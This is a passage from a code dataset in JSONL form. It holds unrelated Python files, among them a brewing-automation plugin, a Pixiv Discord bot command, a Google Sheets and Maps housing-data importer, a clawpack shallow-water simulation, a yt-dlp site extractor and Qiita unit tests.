Doc2Vec(totalTagged, min_count = 1, workers=1, vector_size=3)\r\nmodel.build_vocab(totalTagged, update=True) \r\nmodel.train(totalTagged,total_examples=1, epochs=1000000)\r\n# Print all the words that are similar to these words\r\nprint(model.wv.most_similar(\"have\"))\r\nprint(model.wv.most_similar(\"Some\"))\r\n\r\n#Print all the sentences that are similar to the labels \r\nprint(model.docvecs.most_similar(0))\r\nprint(model.docvecs.most_similar(8))\r\n\r\n#print(model.wv)","repo_name":"kokwai4869/NLP","sub_path":"Doc2Vec/Doc2VecSimple.py","file_name":"Doc2VecSimple.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2277557866","text":"# -*- coding: utf-8 -*-\n################################################################################\nimport time\n\nfrom modules.core.props import Property, StepProperty\nfrom modules.core.step import StepBase\nfrom modules import cbpi\n\n################################################################################\n@cbpi.step\nclass AltMashInStep(StepBase):\n # Properties\n a_kettle_prop = StepProperty.Kettle(\"Kettle\", description=\"Kettle in which the mashing takes place\")\n b_target_prop = Property.Number(\"Temperature\", configurable=True, description=\"Target Temperature of Mash Step\")\n c_agitator_prop = Property.Select(\"Run agitator while heating?\", options=[\"Yes\",\"No\"])\n d_kill_heat_prop = Property.Select(\"Turn off heater when target reached?\", options=[\"Yes\",\"No\"])\n\n #-------------------------------------------------------------------------------\n def init(self):\n self.kettle = int(self.a_kettle_prop)\n self.target = float(self.b_target_prop)\n self.agitator_run = self.c_agitator_prop == \"Yes\"\n self.kill_heat = self.d_kill_heat_prop == \"Yes\"\n self.done = False\n\n self.agitator = zint(cbpi.cache.get(\"kettle\")[self.kettle].agitator)\n\n # set target temp\n self.set_target_temp(self.target, self.kettle)\n if self.agitator and self.agitator_run:\n self.actor_on(self.agitator)\n\n #-------------------------------------------------------------------------------\n def finish(self):\n self.set_target_temp(0, self.kettle)\n\n #-------------------------------------------------------------------------------\n def execute(self):\n # Check if Target Temp is reached\n if (self.get_kettle_temp(self.kettle) >= self.target) and (self.done is False):\n self.done = True\n if self.kill_heat:\n self.set_target_temp(0, self.kettle)\n if self.agitator:\n self.actor_off(self.agitator)\n self.notify(\"{} complete\".format(self.name), \"Press next button to continue\", type='warning', timeout=None)\n\n################################################################################\n@cbpi.step\nclass AltMashStep(StepBase):\n # Properties\n a_kettle_prop = StepProperty.Kettle(\"Kettle\", description=\"Kettle in which the mashing takes place\")\n b_target_prop = Property.Number(\"Temperature\", configurable=True, description=\"Target Temperature of Mash Step\")\n c_timer_prop = Property.Number(\"Timer in minutes\", configurable=True, description=\"Amount of time to maintain taget temperature in this step\")\n d_offset_prop = Property.Number(\"Target timer offset\", configurable=True, default_value=0, description=\"Start timer when temperature is this close to target. Useful for PID heaters that approach target slowly.\")\n e_agitator_start_prop = Property.Select(\"Turn agitator on at start?\", options=[\"Yes\",\"No\"])\n f_agitator_stop_prop = Property.Select(\"Turn agitator off at end?\", options=[\"Yes\",\"No\"])\n #-------------------------------------------------------------------------------\n def init(self):\n self.kettle = int(self.a_kettle_prop)\n self.target = float(self.b_target_prop)\n self.timer = float(self.c_timer_prop)\n self.offset = float(self.d_offset_prop)\n self.agitator_start = self.e_agitator_start_prop == \"Yes\"\n self.agitator_stop = self.f_agitator_stop_prop == \"Yes\"\n\n self.agitator = zint(cbpi.cache.get(\"kettle\")[self.kettle].agitator)\n\n # set target temp\n self.set_target_temp(self.target, self.kettle)\n if self.agitator and self.agitator_start:\n self.actor_on(self.agitator)\n\n #-------------------------------------------------------------------------------\n @cbpi.action(\"Start Timer Now\")\n def start(self):\n if self.is_timer_finished() is None:\n self.start_timer(self.timer * 60)\n\n #-------------------------------------------------------------------------------\n def reset(self):\n self.stop_timer()\n self.set_target_temp(self.target, self.kettle)\n\n #-------------------------------------------------------------------------------\n def finish(self):\n self.set_target_temp(0, self.kettle)\n if self.agitator and self.agitator_stop:\n self.actor_off(self.agitator)\n\n #-------------------------------------------------------------------------------\n def execute(self):\n # Check if Target Temp is reached\n if self.get_kettle_temp(self.kettle) >= self.target - self.offset:\n # Check if Timer is Running\n if self.is_timer_finished() is None:\n self.start_timer(self.timer * 60)\n\n # Check if timer finished and go to next step\n if self.is_timer_finished() is True:\n self.notify(\"{} complete\".format(self.name), \"Starting the next step\", type='success', timeout=None)\n self.next()\n\n################################################################################\n@cbpi.step\nclass AltBoilStep(StepBase):\n # Properties\n textDesc = \"Brief description of the addition\"\n timeDesc = \"Time in minutes before end of boil\"\n add_1_text = Property.Text(\"Addition 1 Name\", configurable=True, description = textDesc)\n add_1_time = Property.Number(\"Addition 1 Time\", configurable=True, description = timeDesc)\n add_2_text = Property.Text(\"Addition 2 Name\", configurable=True, description = textDesc)\n add_2_time = Property.Number(\"Addition 2 Time\", configurable=True, description = timeDesc)\n add_3_text = Property.Text(\"Addition 3 Name\", configurable=True, description = textDesc)\n add_3_time = Property.Number(\"Addition 3 Time\", configurable=True, description = timeDesc)\n add_4_text = Property.Text(\"Addition 4 Name\", configurable=True, description = textDesc)\n add_4_time = Property.Number(\"Addition 4 Time\", configurable=True, description = timeDesc)\n add_5_text = Property.Text(\"Addition 5 Name\", configurable=True, description = textDesc)\n add_5_time = Property.Number(\"Addition 5 Time\", configurable=True, description = timeDesc)\n add_6_text = Property.Text(\"Addition 6 Name\", configurable=True, description = textDesc)\n add_6_time = Property.Number(\"Addition 6 Time\", configurable=True, description = timeDesc)\n add_7_text = Property.Text(\"Addition 7 Name\", configurable=True, description = textDesc)\n add_7_time = Property.Number(\"Addition 7 Time\", configurable=True, description = timeDesc)\n add_8_text = Property.Text(\"Addition 8 Name\", configurable=True, description = textDesc)\n add_8_time = Property.Number(\"Addition 8 Time\", configurable=True, description = timeDesc)\n\n kettle_prop = StepProperty.Kettle(\"Kettle\", description=\"Kettle in which the boiling step takes place\")\n target_prop = Property.Number(\"Temperature\", configurable=True, description=\"Target temperature for boiling\")\n timer_prop = Property.Number(\"Timer in Minutes\", configurable=True, default_value=90, description=\"Timer is started when target temperature is reached\")\n\n warning_addition_prop = Property.Number(\"Addition Warning\", configurable=True, default_value=30, description=\"Time in seconds to warn before each addition\")\n warning_boil_prop = Property.Number(\"Boil Warning\", configurable=True, default_value=1, description=\"Degrees below target to warn of impending boil\")\n\n #-------------------------------------------------------------------------------\n def init(self):\n\n self.target = float(self.target_prop)\n self.kettle = int(self.kettle_prop)\n self.timer = float(self.timer_prop) * 60.0\n self.warn_add = float(self.warning_addition_prop)\n self.warn_boil = float(self.warning_boil_prop)\n\n self.done_boil_warn = False\n self.done_boil_alert = False\n\n # set the additions dictionary\n self.additions = dict()\n for i in range(1,9):\n additionTime = self.__getattribute__(\"add_{}_time\".format(i))\n additionText = self.__getattribute__(\"add_{}_text\".format(i))\n try:\n if additionText is None:\n additionText = \"Addition {}\".format(i)\n self.additions[i] = {\n 'text': additionText,\n 'time': float(additionTime) * 60.0,\n 'mins': int(additionTime),\n 'done': False,\n 'warn': False,\n }\n except:\n # empty or invalid addition\n pass\n # set target temp\n self.set_target_temp(self.target, self.kettle)\n\n #-------------------------------------------------------------------------------\n @cbpi.action(\"Start Timer Now\")\n def start(self):\n if self.is_timer_finished() is None:\n self.start_timer(self.timer)\n\n #-------------------------------------------------------------------------------\n def reset(self):\n self.stop_timer()\n self.set_target_temp(self.target, self.kettle)\n\n #-------------------------------------------------------------------------------\n def finish(self):\n self.set_target_temp(0, self.kettle)\n\n #-------------------------------------------------------------------------------\n def execute(self):\n # Check if Target Temp is reached\n if self.is_timer_finished() is None:\n self.check_boil_warnings()\n if self.get_kettle_temp(self.kettle) >= self.target:\n self.start_timer(self.timer)\n elif self.is_timer_finished() is True:\n self.notify(\"{} complete\".format(self.name), \"Starting the next step\", type='success', timeout=None)\n self.next()\n else:\n self.check_addition_timers()\n\n #-------------------------------------------------------------------------------\n def check_addition_timers(self):\n for i in self.additions:\n addition_time = self.timer_end - self.additions[i]['time']\n warning_time = addition_time - self.warn_add\n now = time.time()\n if not self.additions[i]['warn'] and now > warning_time:\n self.additions[i]['warn'] = True\n self.notify(\"Warning: {} min Additions\".format(self.additions[i]['mins']),\n \"Add {} in {} seconds\".format(self.additions[i]['text'],self.warn_add),\n type='info', timeout=(self.warn_add - 1)*1000)\n if not self.additions[i]['done'] and now > addition_time:\n self.additions[i]['done'] = True\n self.notify(\"Alert: {} min Additions\".format(self.additions[i]['mins']),\n \"Add {} now\".format(self.additions[i]['text']),\n type='warning', timeout=None)\n\n #-------------------------------------------------------------------------------\n def check_boil_warnings(self):\n if (not self.done_boil_warn) and (self.get_kettle_temp(self.kettle) >= self.target - self.warn_boil):\n self.notify(\"Warning: Boil Approaching\", \"Current Temp {:.1f}\".format(self.get_kettle_temp(self.kettle)),\n type=\"info\", timeout=self.warn_add*1000)\n self.done_boil_warn = True\n if (not self.done_boil_alert) and (self.get_kettle_temp(self.kettle) >= self.target):\n self.notify(\"Alert: Boil Imminent\", \"Current Temp {:.1f}\".format(self.get_kettle_temp(self.kettle)),\n type=\"warning\", timeout=None)\n self.done_boil_alert = True\n\n################################################################################\n# Utilities\n################################################################################\ndef zint(value):\n try: return int(float(value))\n except: return 0\n","repo_name":"JoshShearer/AutomatedBrew","sub_path":"modules/plugins/AltBaseSteps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40605315325","text":"from irrad_control.analysis import plotting, constants\nfrom irrad_control.utils.utils import duration_str_from_secs\n\ndef main(data, config=None):\n\n figs = []\n server = config['name']\n\n beam_current = data[server]['Beam']['beam_current'] / constants.nano\n\n # Beam current over time\n fig, _ = plotting.plot_beam_current(timestamps=data[server]['Beam']['timestamp'],\n beam_current=beam_current)\n figs.append(fig)\n\n # Beam current histogram\n plot_data = {\n 'xdata': beam_current,\n 'xlabel': 'Beam current / nA',\n 'ylabel': '#',\n 'label': \"Beam current over {}\".format(duration_str_from_secs(seconds=data[server]['Beam']['timestamp'][-1]-data[server]['Beam']['timestamp'][0])),\n 'title': \"Beam current distribution\",\n 'fmt': 'C0'\n }\n plot_data['label'] += \":\\n ({:.2f}{}{:.2f}) nA\".format(beam_current.mean(), u'\\u00b1', beam_current.std())\n\n fig, _ = plotting.plot_generic_fig(plot_data=plot_data, hist_data={'bins': 'stat'})\n figs.append(fig)\n\n # Relative position of beam-mean wrt the beam pipe center\n fig, _ = plotting.plot_relative_beam_position(horizontal_pos=data[server]['Beam']['horizontal_beam_position'],\n vertical_pos=data[server]['Beam']['vertical_beam_position'])\n figs.append(fig)\n\n return figs","repo_name":"cyclotron-bonn/irrad_control","sub_path":"irrad_control/analysis/beam.py","file_name":"beam.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9298113411","text":"import io\n\nimport discord\nfrom artworks import illustration\nfrom discord import File\nfrom pixiv_keywords import PixivIllustrationSize\n\nfrom command import Command\n\n\nclass DirectPixivImgCommand(Command):\n def __init__(self):\n super().__init__()\n self.name = 'pixiv'\n\n async def run(self, ctx, *args):\n info = illustration.get_artwork_info(args[0])\n\n page = (0 if args[1] > info.get_page_count() else args[1]) if len(args) > 1 else 0\n\n image = info.get_image(PixivIllustrationSize.REGULAR, page)\n file = io.BytesIO(image)\n filename = f'{args[0]}_p{page}.{info.get_image_format(PixivIllustrationSize.REGULAR)}'\n attachment = File(file, filename=filename)\n\n embed = discord.Embed()\n embed.add_field(name=\"標題\", value=info.get_title(), inline=False)\n embed.add_field(name=\"簡介\", value='\\u200B' if info.get_description()=='' else info.get_description(),\n inline=False)\n # embed.add_field(name=\"標籤\", value=info.get_tags(), inline=False)\n embed.add_field(name=\"作者\", value=info.get_author_name(), inline=False)\n embed.add_field(name=\"ID\", value=f'[{info.get_id()}](https://www.pixiv.net/artworks/{info.get_id()})',\n inline=True)\n embed.add_field(name=\"頁碼\", value=page, inline=False)\n embed.add_field(name=\"頁數\", value=info.get_page_count(), inline=True)\n embed.set_image(url=\"attachment://\" + filename)\n\n await ctx.send(file=attachment, embed=embed)\n","repo_name":"Huanying04/HitomiBot","sub_path":"commands/direct_pixiv_img.py","file_name":"direct_pixiv_img.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73107297851","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n\nGiven an input string, reverse the string word by word.\n\nFor example,\nGiven s = \"the sky is blue\",\nreturn \"blue is sky the\".\n\n\"\"\"\n\nclass Solution:\n # @param s, a string\n # @return a string\n def reverseWords(self, s):\n splited = s.split(' ')\n\n if len(splited)==0:\n return None\n else:\n s = ' '.join(reversed(s.split()))\n return s\n\n\n\n\n\n","repo_name":"fzhurd/fzwork","sub_path":"PythonWork/codeexer/reverse_words.py","file_name":"reverse_words.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"6826355934","text":"from os import system\nimport argparse\nimport os.path\nimport requests\nimport json\nimport math\nimport time\nimport urllib.parse\nfrom googleapiclient.discovery import build\nfrom googlesearch import search\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\n\n# If modifying these scopes, delete the file token.json.\nSCOPES = [\"https://www.googleapis.com/auth/spreadsheets.readonly\"]\n\n# The ID and range of a sample spreadsheet.\nRANGE_TEMPLATE = \"{tab}!A2:J\"\n\nADDR_RESOLUTION_TEMPLATE = \"https://maps.googleapis.com/maps/api/place/findplacefromtext/json?fields=formatted_address%2Cname%2Cgeometry&input={raw_addr}&inputtype=textquery&key={maps_api_key}\"\n\n\ndef loadCreds():\n sheets_creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists(\"../credentials/token.json\"):\n sheets_creds = Credentials.from_authorized_user_file(\"../credentials/token.json\", SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not sheets_creds or not sheets_creds.valid:\n if sheets_creds and sheets_creds.expired and sheets_creds.refresh_token:\n sheets_creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\"../credentials/credentials.json\", SCOPES)\n sheets_creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open(\"../credentials/token.json\", \"w\") as token:\n token.write(sheets_creds.to_json())\n\n maps_api_key = None\n if os.path.exists(\"../credentials/maps_key.json\"):\n key_file = open(\"../credentials/maps_key.json\")\n maps_api_key = json.load(key_file)[\"key\"]\n else:\n print(\"Missing maps_key.json with Google Maps API key\")\n quit()\n\n return sheets_creds, maps_api_key\n\n\ndef loadSheets(sheets_creds, sheet_id):\n service = build(\"sheets\", \"v4\", credentials=sheets_creds)\n\n # Call the Sheets API\n sheet = service.spreadsheets()\n\n # Get Sheet metadata\n metadata = sheet.get(spreadsheetId=sheet_id).execute()\n tabs = []\n for sheet in metadata.get(\"sheets\", []):\n tabs.append(sheet[\"properties\"][\"title\"])\n\n # Get Sheet content\n result = []\n for tab in tabs:\n print(\"Loading {tab}\".format(tab=tab))\n sheet = service.spreadsheets()\n contents = (\n sheet.values()\n .get(\n spreadsheetId=sheet_id,\n range=RANGE_TEMPLATE.format(tab=tab),\n )\n .execute()\n )\n rows = contents.get(\"values\", [])\n result = result + rows\n\n print(\n \"Finished loading {num_rows} rows from sheet {sheet_id}\".format(\n num_rows=len(result), sheet_id=sheet_id\n )\n )\n return result\n\n\ndef toHouseEntries(values, maps_api_key):\n if not values:\n print(\"No data found.\")\n else:\n result = []\n for row in values:\n raw_addr = \"\"\n if len(row) != 9 and len(row) != 10:\n continue\n elif len(row) == 9:\n raw_addr = \" \".join([row[1], row[2], row[3], row[4]])\n rowDict = {\n \"mls_id\": row[0],\n \"bed_baths\": row[5],\n \"sqft\": row[6],\n \"year_built\": row[7],\n \"price\": row[8],\n \"type\": \"SFR\",\n }\n elif len(row) == 10:\n raw_addr = \" \".join([row[2], row[3], row[4], row[5]])\n rowDict = {\n \"mls_id\": row[0],\n \"bed_baths\": row[6],\n \"sqft\": row[7],\n \"year_built\": row[8],\n \"price\": row[9],\n \"type\": row[1],\n }\n\n resolvedGeoData = getGeoData(raw_addr, maps_api_key, attempt=1)\n link = getFirstSearchResult(rowDict[\"mls_id\"], attempt=1)\n if len(resolvedGeoData) == 0 or link is None:\n continue\n\n rowDict[\"addr\"] = resolvedGeoData[\"formatted_addr\"]\n rowDict[\"coordinates\"] = resolvedGeoData[\"coordinates\"]\n rowDict[\"link\"] = link\n\n result.append(rowDict)\n\n return result\n\n\ndef getGeoData(raw_addr, maps_api_key, attempt):\n url = ADDR_RESOLUTION_TEMPLATE.format(\n raw_addr=urllib.parse.quote(raw_addr), maps_api_key=maps_api_key\n )\n resp = requests.get(url=url)\n\n if resp.status_code != 200 or resp.json()[\"status\"] == \"OVER_QUERY_LIMIT\":\n backoff_time = math.pow(2, attempt)\n if resp.status_code == 200:\n print(resp.json())\n print(\n \"Retrying fetching {raw_addr} in {wait} seconds\".format(\n raw_addr=raw_addr, wait=backoff_time\n )\n )\n time.sleep(backoff_time)\n return getGeoData(raw_addr, maps_api_key, attempt + 1)\n elif len(resp.json()[\"candidates\"]) == 0:\n print(\n \"Found no matches for {raw_addr}: {resp}\".format(\n raw_addr=raw_addr, resp=resp.json()\n )\n )\n return {}\n else:\n info = resp.json()[\"candidates\"][0]\n print(\n \"Fetched {raw_addr} in attempt {attempt_num}\".format(\n raw_addr=raw_addr, attempt_num=attempt\n )\n )\n return {\n \"formatted_addr\": info[\"formatted_address\"],\n \"coordinates\": info[\"geometry\"][\"location\"],\n }\n\n\ndef getFirstSearchResult(mls_id, attempt):\n res = next(\n search(\"MLS {mls_id}\".format(mls_id=mls_id), num=1, stop=1, pause=2), None\n )\n if res is None:\n if attempt == 3:\n print(\"Found no links for {mls_id}\".format(mls_id=mls_id))\n return None\n backoff_time = math.pow(2, attempt)\n print(\n \"Retrying fetching link for {mls_id} in {wait} seconds\".format(\n mls_id=mls_id, wait=backoff_time\n )\n )\n return getFirstSearchResult(mls_id, attempt + 1)\n print(\n \"Fetched link for {mls_id} in attempt {attempt_num}\".format(\n mls_id=mls_id, attempt_num=attempt\n )\n )\n return res\n\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-sid\", \"--sheet_id\", help=\"Sheet ID\")\n parser.add_argument(\n \"-disk\",\n \"--write_to_disk\",\n default=False,\n required=False,\n help=\"Whether or not to write imported results to disk\",\n type=bool,\n )\n args = parser.parse_args()\n\n sheets_creds, maps_api_key = loadCreds()\n raw_sheet_rows = loadSheets(sheets_creds, args.sheet_id)\n output_rows = toHouseEntries(raw_sheet_rows, maps_api_key)\n\n if args.write_to_disk is True:\n with open(\"houses.json\", \"w\") as output_file:\n json.dump(output_rows, output_file, indent=4)\n\n print(\"Finished importing housing data\")\n exit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"guilam34/house_mapper","sub_path":"importer/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37420888012","text":"#!/usr/bin/env python\n# encoding: utf-8\nr\"\"\"\n2D shallow water: radial dam break\n==================================\n\nSolve the 2D shallow water equations:\n\n.. :math:\n h_t + (hu)_x + (hv)_y & = 0 \\\\\n (hu)_t + (hu^2 + \\frac{1}{2}gh^2)_x + (huv)_y & = 0 \\\\\n (hv)_t + (huv)_x + (hv^2 + \\frac{1}{2}gh^2)_y & = 0.\n\nThe initial condition is a circular area with high depth surrounded by lower-depth water.\nThe top and right boundary conditions reflect, while the bottom and left boundaries\nare outflow.\n\"\"\"\n\nimport numpy as np\nfrom clawpack import riemann\nfrom clawpack.riemann.shallow_roe_with_efix_2D_constants import depth, x_momentum, y_momentum, num_eqn\nimport overridden_fun\n\nclass Parameters(object):\n\n def __init__(self):\n r\"\"\"\n Initialization of default parameters.\n \"\"\"\n self.xlower = -2.5\n self.xupper = 2.5\n self.ylower = -2.5\n self.yupper = 2.5\n self.tfinal = 2.5\n self.num_output_times = 10\n self.max_steps = 100000\n self.tv_check = False\n self.check_lmm_cond = True\n self.use_petsc = False\n\n def set_initial_cond(self,state,h_in=2.,h_out=1.,dam_radius=1.):\n r\"\"\"\n Set initial condition.\n \"\"\"\n x0=0.\n y0=0.\n X, Y = state.p_centers\n r = np.sqrt((X-x0)**2 + (Y-y0)**2)\n r0 = dam_radius\n h = 1.+ np.exp(-10.*(r-r0)**2)\n state.q[depth ,:,:] = h#h_in*(r<=dam_radius) + h_out*(r>dam_radius)\n state.q[x_momentum,:,:] = -X*np.exp(-10.*(r-r0)**2)##0.\n state.q[y_momentum,:,:] = -Y*np.exp(-10.*(r-r0)**2)##0.\n\n\ndef setup(nx=[150,150],kernel_language='Fortran',solver_type='sharpclaw',time_integrator='SSP104',lmm_steps=None,\\\n cfl=None,lim_type=2,limiter=4,dt_variable=True,dt_initial=None,outdir='./_output',\\\n paramtrs=Parameters()):\n\n if paramtrs.use_petsc:\n import clawpack.petclaw as pyclaw\n claw_package = 'clawpack.petclaw'\n else:\n from clawpack import pyclaw\n claw_package = 'clawpack.pyclaw'\n\n if kernel_language == 'Fortran':\n riemann_solver = riemann.shallow_roe_with_efix_2D\n else: \n raise Exception('Use kernel_language=''Fortran''.')\n\n if solver_type == 'classic':\n solver = overridden_fun.set_solver(pyclaw.ClawSolver2D,riemann_solver,claw_package=claw_package)\n solver.limiters = pyclaw.limiters.tvd.MC\n solver.dimensional_split=1\n elif solver_type == 'sharpclaw':\n solver = overridden_fun.set_solver(pyclaw.SharpClawSolver2D,riemann_solver,claw_package=claw_package)\n solver.time_integrator = time_integrator\n solver.lmm_steps = lmm_steps\n solver.check_lmm_cond = paramtrs.check_lmm_cond\n solver.lim_type = lim_type\n if cfl is not None:\n solver.cfl_desired = cfl[0]\n solver.cfl_max = cfl[1]\n if lim_type == 1:\n solver.limiters = limiter\n if dt_variable == False:\n solver.dt_variable = False\n solver.dt_initial = dt_initial\n\n solver.kernel_language = kernel_language\n solver.tv_check = paramtrs.tv_check\n solver.use_petsc = paramtrs.use_petsc\n\n solver.bc_lower[0] = pyclaw.BC.extrap\n solver.bc_upper[0] = pyclaw.BC.wall\n solver.bc_lower[1] = pyclaw.BC.extrap\n solver.bc_upper[1] = pyclaw.BC.wall\n\n # Domain:\n x = pyclaw.Dimension(paramtrs.xlower,paramtrs.xupper,nx[0],name= 'x')\n y = pyclaw.Dimension(paramtrs.ylower,paramtrs.yupper,nx[1],name= 'y')\n domain = pyclaw.Domain([x,y])\n\n state = pyclaw.State(domain,num_eqn)\n\n # Gravitational constant\n state.problem_data['grav'] = 1.0\n\n paramtrs.set_initial_cond(state)\n\n claw = pyclaw.Controller()\n claw.solution = pyclaw.Solution(state,domain)\n claw.solver = solver\n claw.outdir = outdir\n claw.solver.max_steps = paramtrs.max_steps\n claw.tfinal = paramtrs.tfinal\n claw.num_output_times = paramtrs.num_output_times\n claw.setplot = setplot\n claw.keep_copy = True\n\n return claw\n\n#--------------------------\ndef setplot(plotdata):\n#--------------------------\n \"\"\" \n Specify what is to be plotted at each frame.\n Input: plotdata, an instance of visclaw.data.ClawPlotData.\n Output: a modified version of plotdata.\n \"\"\" \n from clawpack.visclaw import colormaps\n\n plotdata.clearfigures() # clear any old figures,axes,items data\n\n # Figure for depth\n plotfigure = plotdata.new_plotfigure(name='Water height', figno=0)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = [-2.5, 2.5]\n plotaxes.ylimits = [-2.5, 2.5]\n plotaxes.title = 'Water height'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = 0\n plotitem.pcolor_cmap = colormaps.red_yellow_blue\n plotitem.pcolor_cmin = 0.5\n plotitem.pcolor_cmax = 1.5\n plotitem.add_colorbar = True\n \n # Scatter plot of depth\n plotfigure = plotdata.new_plotfigure(name='Scatter plot of h', figno=1)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = [0., 2.5]\n plotaxes.ylimits = [0., 2.1]\n plotaxes.title = 'Scatter plot of h'\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')\n plotitem.plot_var = depth\n def q_vs_radius(current_data):\n from numpy import sqrt\n x = current_data.x\n y = current_data.y\n r = sqrt(x**2 + y**2)\n q = current_data.q[depth,:,:]\n return r,q\n plotitem.map_2d_to_1d = q_vs_radius\n plotitem.plotstyle = 'o'\n\n\n # Figure for x-momentum\n plotfigure = plotdata.new_plotfigure(name='Momentum in x direction', figno=2)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = [-2.5, 2.5]\n plotaxes.ylimits = [-2.5, 2.5]\n plotaxes.title = 'Momentum in x direction'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = x_momentum\n plotitem.pcolor_cmap = colormaps.yellow_red_blue\n plotitem.add_colorbar = True\n plotitem.show = False # show on plot?\n \n\n # Figure for y-momentum\n plotfigure = plotdata.new_plotfigure(name='Momentum in y direction', figno=3)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = [-2.5, 2.5]\n plotaxes.ylimits = [-2.5, 2.5]\n plotaxes.title = 'Momentum in y direction'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = y_momentum\n plotitem.pcolor_cmap = colormaps.yellow_red_blue\n plotitem.add_colorbar = True\n plotitem.show = False # show on plot?\n \n return plotdata\n\n\nif __name__==\"__main__\":\n from clawpack.pyclaw.util import run_app_from_main\n output = run_app_from_main(setup,setplot)\n","repo_name":"numerical-mathematics/ssp-lmm-vss_RR","sub_path":"radial_shallow_water_2d.py","file_name":"radial_shallow_water_2d.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"37598982092","text":"from .common import InfoExtractor\nfrom ..utils import remove_end\n\n\nclass CrtvgIE(InfoExtractor):\n _VALID_URL = r'https?://(?:www\\.)?crtvg\\.es/tvg/a-carta/[^/#?]+-(?P\\d+)'\n _TESTS = [{\n 'url': 'https://www.crtvg.es/tvg/a-carta/os-caimans-do-tea-5839623',\n 'md5': 'c0958d9ff90e4503a75544358758921d',\n 'info_dict': {\n 'id': '5839623',\n 'title': 'Os caimáns do Tea',\n 'ext': 'mp4',\n 'description': 'md5:f71cfba21ae564f0a6f415b31de1f842',\n 'thumbnail': r're:^https?://.*\\.(?:jpg|png)',\n },\n 'params': {'skip_download': 'm3u8'}\n }]\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n webpage = self._download_webpage(url, video_id)\n video_url = self._search_regex(r'var\\s+url\\s*=\\s*[\"\\']([^\"\\']+)', webpage, 'video url')\n formats = self._extract_m3u8_formats(video_url + '/playlist.m3u8', video_id, fatal=False)\n formats.extend(self._extract_mpd_formats(video_url + '/manifest.mpd', video_id, fatal=False))\n\n return {\n 'id': video_id,\n 'formats': formats,\n 'title': remove_end(self._html_search_meta(\n ['og:title', 'twitter:title'], webpage, 'title', default=None), ' | CRTVG'),\n 'description': self._html_search_meta('description', webpage, 'description', default=None),\n 'thumbnail': self._html_search_meta(['og:image', 'twitter:image'], webpage, 'thumbnail', default=None),\n }\n","repo_name":"yt-dlp/yt-dlp","sub_path":"yt_dlp/extractor/crtvg.py","file_name":"crtvg.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":60520,"dataset":"github-code","pt":"78"} +{"seq_id":"2140886972","text":"from unittest import TestCase, main\nfrom tempfile import mkstemp\nfrom os import close, remove\nfrom os.path import join, exists\nfrom collections import Iterable\nfrom copy import deepcopy\nfrom datetime import datetime\n\nimport numpy.testing as npt\nimport pandas as pd\nfrom pandas.testing import assert_frame_equal\n\nfrom qiita_core.util import qiita_test_checker\nfrom qiita_core.exceptions import IncompetentQiitaDeveloperError\nimport qiita_db as qdb\n\n\n@qiita_test_checker()\nclass TestPrepSample(TestCase):\n def setUp(self):\n self.prep_template = \\\n qdb.metadata_template.prep_template.PrepTemplate(1)\n self.sample_id = '1.SKB8.640193'\n self.tester = qdb.metadata_template.prep_template.PrepSample(\n self.sample_id, self.prep_template)\n self.exp_categories = {'center_name', 'center_project_name',\n 'emp_status', 'barcode', 'instrument_model',\n 'library_construction_protocol',\n 'primer', 'target_subfragment',\n 'target_gene', 'run_center', 'run_prefix',\n 'run_date', 'experiment_center',\n 'experiment_design_description',\n 'experiment_title', 'platform', 'samp_size',\n 'sequencing_meth', 'illumina_technology',\n 'sample_center', 'pcr_primers', 'study_center'}\n\n def test_init_unknown_error(self):\n \"\"\"Init errors if the PrepSample id is not found in the template\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBUnknownIDError):\n qdb.metadata_template.prep_template.PrepSample(\n 'Not_a_Sample', self.prep_template)\n\n def test_init_wrong_template(self):\n \"\"\"Raises an error if using a SampleTemplate instead of PrepTemplate\"\"\"\n with self.assertRaises(IncompetentQiitaDeveloperError):\n qdb.metadata_template.prep_template.PrepSample(\n 